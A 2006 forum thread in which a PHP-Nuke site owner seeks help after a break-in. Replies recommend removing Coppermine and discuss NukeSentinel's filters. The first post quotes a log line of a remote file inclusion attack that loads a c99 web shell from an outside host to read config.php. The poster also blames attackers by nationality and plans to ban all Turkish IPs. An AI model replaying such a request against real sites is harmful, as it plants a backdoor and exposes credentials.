Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel™ v2.4.x
Author Message
Jenses
New Member
New Member


Joined: Feb 15, 2006
Posts: 6

PostPosted: Thu Feb 16, 2006 1:59 pm Reply with quote

Got hacked by this kind of method (from my sites log)
Code:
85.97.105.136 - - [16/Feb/2006:01:21:35 +0100] "GET /modules/coppermine/themes/maze/theme.php?THEME_DIR=http%3A%2F%2Fwww.funmekani.com%2Fq%2Fc99shell.txt%3F&act=f&f=config.php&d=%2Fxxxx%2Fxxxx%2Fxxxx%2Fxxxxx%2Fdomain.dk& HTTP/1.1" 200 6224 

(xxx are replacements from my actual path)

I do now that the theme.php was obsolete and apparently included some bug - this file is removed, but how can I know if there are other files like this one that will open a back door to my system.

My domain is danish so right now many turkish hackers find it to be there right to hack me (muhammed cartoons).
I can ban all turkish IP's - but then they just let theire relatives in Europe do it.

Isnt there a way to catch this kind of hack-attempts??
 
View user's profile Send private message
Raven
Site Admin/Owner


Joined: Aug 27, 2002
Posts: 17077

PostPosted: Thu Feb 16, 2006 2:01 pm Reply with quote

Get rid of Coppermine if you use nuke. We can't reiterate this enough. Just search the forums for information.
 
View user's profile Send private message
jaded
Theme Guru


Joined: Nov 01, 2003
Posts: 1006

PostPosted: Thu Feb 16, 2006 2:26 pm Reply with quote

Yes, More then likely, as Raven pointed out, it is coppermine. Be sure that if you do remove it, you remove ALL of it. This has been discussed many, many times. Thanks and Good Luck!

_________________
Themes BB Skins Only registered users can see links on this board! Get registered or login!
Graphic Tees Only registered users can see links on this board! Get registered or login!
Paranormal Tees Only registered users can see links on this board! Get registered or login!
Ghost Stories & More Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
Raven
PostPosted: Thu Feb 16, 2006 4:50 pm Reply with quote

Jenses, Are you at patch level 2,3, or 4 of NukeSentinel v2.4.2? The reason I ask is that I have code in there that would have stopped that.
 
evaders99
Former Moderator in Good Standing


Joined: Apr 30, 2004
Posts: 3221

PostPosted: Thu Feb 16, 2006 5:20 pm Reply with quote

There is code that would have detected this particular Coppermine vulnerability? Or just the cross-scripting part?
What blocker is this in?

_________________
- Only registered users can see links on this board! Get registered or login! -

Need help? Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
Raven
PostPosted: Thu Feb 16, 2006 5:49 pm Reply with quote

xss in includes/nukesentinel.php, pl2 I believe handles the hex and there's other code to trap Only registered users can see links on this board! Get registered or login! in the url request.
 
evaders99
PostPosted: Thu Feb 16, 2006 10:24 pm Reply with quote

Alright, just curious if there is a way to detect such things directly. We could block all these robots trying various exploits for awstats, other Nuke forks, etc. I'm currently using DisError, so when it gets a 404, it passes through a page where I can filter on they were trying to do.
 
Jenses
PostPosted: Fri Feb 17, 2006 3:10 am Reply with quote

Hi Raven
Im on the newest 2.4.2pl4 - have added the pc-killer

I find it a little 'cheap' to say 'get rid of' - we should be able to detect vunerabilities so code can be changed to stop exploites - I wonder if anyone made a tool to test modules systematicly for all known exploites ??
 
Raven
PostPosted: Fri Feb 17, 2006 3:50 am Reply with quote

I actually have one started but I put it on the back burner. So, from me, at least, the answer is no.
 
Jenses
PostPosted: Fri Feb 17, 2006 7:22 am Reply with quote

Hope to see that one soon - in the meantime I add the normal "if (!defined('MODULE_FILE')) {..." to my 3 party modules
- - and ban all turkish IP's from my sites
 
jaded
PostPosted: Fri Feb 17, 2006 7:52 am Reply with quote

That will not be enough to secure coppermine. Most of us strongly suggest that you remove it entirely. Best of luck to you
 
Display posts from previous:       
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel™ v2.4.x

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©